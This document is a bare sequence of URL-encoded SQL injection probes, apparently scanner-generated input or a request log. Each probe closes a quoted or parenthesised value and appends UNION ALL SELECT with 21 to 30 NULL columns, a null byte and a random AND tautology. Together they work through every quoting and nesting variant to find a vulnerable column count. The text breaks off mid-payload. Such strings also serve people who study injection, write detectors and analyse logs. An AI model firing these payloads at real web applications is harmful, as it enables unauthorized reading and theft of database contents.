1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27YULb%27%3D%27YULb 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27TeAU%27%3D%27TeAU 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27aKLV%27%3D%27aKLV 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27fVJm%27%3D%27fVJm 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Rfmd%27%3D%27Rfmd 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27SmEI%27%3D%27SmEI 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27GpWR%27%3D%27GpWR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27dekN%27%3D%27dekN 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Sacr%27%3D%27Sacr 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27NOig%27%3D%27NOig 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27eURC%27%3D%27eURC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27MASp%27%3D%27MASp 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Nude%27%3D%27Nude 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27TEEy%27%3D%27TEEy 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27CQRW%27%3D%27CQRW 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27ELoe%27%3D%27ELoe 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Tzqi%27%3D%27Tzqi 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27cPNm%27%3D%27cPNm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27hbRN%27%3D%27hbRN 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27FKZE%27%3D%27FKZE 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27IiWx%27%3D%27IiWx 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27yJQt%27%3D%27yJQt 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27myfl%27%3D%27myfl 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27OgNU%27%3D%27OgNU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Eaji%27%3D%27Eaji 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27TqrP%27%3D%27TqrP 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27pwti%27%3D%27pwti 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Meps%27%3D%27Meps 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27iisG%27%3D%27iisG 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27MiVC%27%20LIKE%20%27MiVC 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27JJeq%27%20LIKE%20%27JJeq 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27VIlm%27%20LIKE%20%27VIlm 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27BKtQ%27%20LIKE%20%27BKtQ 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27EIja%27%20LIKE%20%27EIja 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27fUlR%27%20LIKE%20%27fUlR 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27QLbT%27%20LIKE%20%27QLbT 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27xssw%27%20LIKE%20%27xssw 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Ppth%27%20LIKE%20%27Ppth 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27jgzJ%27%20LIKE%20%27jgzJ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27bJak%27%20LIKE%20%27bJak 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Txmm%27%20LIKE%20%27Txmm 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27LULi%27%20LIKE%20%27LULi 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27aUqL%27%20LIKE%20%27aUqL 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27ySKv%27%20LIKE%20%27ySKv 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27iZwe%27%20LIKE%20%27iZwe 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27iKkx%27%20LIKE%20%27iKkx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Balv%27%20LIKE%20%27Balv 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27kLco%27%20LIKE%20%27kLco 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27qXuV%27%20LIKE%20%27qXuV 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27uRkn%27%20LIKE%20%27uRkn 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27kkVr%27%20LIKE%20%27kkVr 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27dJiE%27%20LIKE%20%27dJiE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27dAKl%27%20LIKE%20%27dAKl 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27HFoz%27%20LIKE%20%27HFoz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27emNd%27%20LIKE%20%27emNd 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27ekuk%27%20LIKE%20%27ekuk 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27QgCR%27%20LIKE%20%27QgCR 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27LmJY%27%20LIKE%20%27LmJY 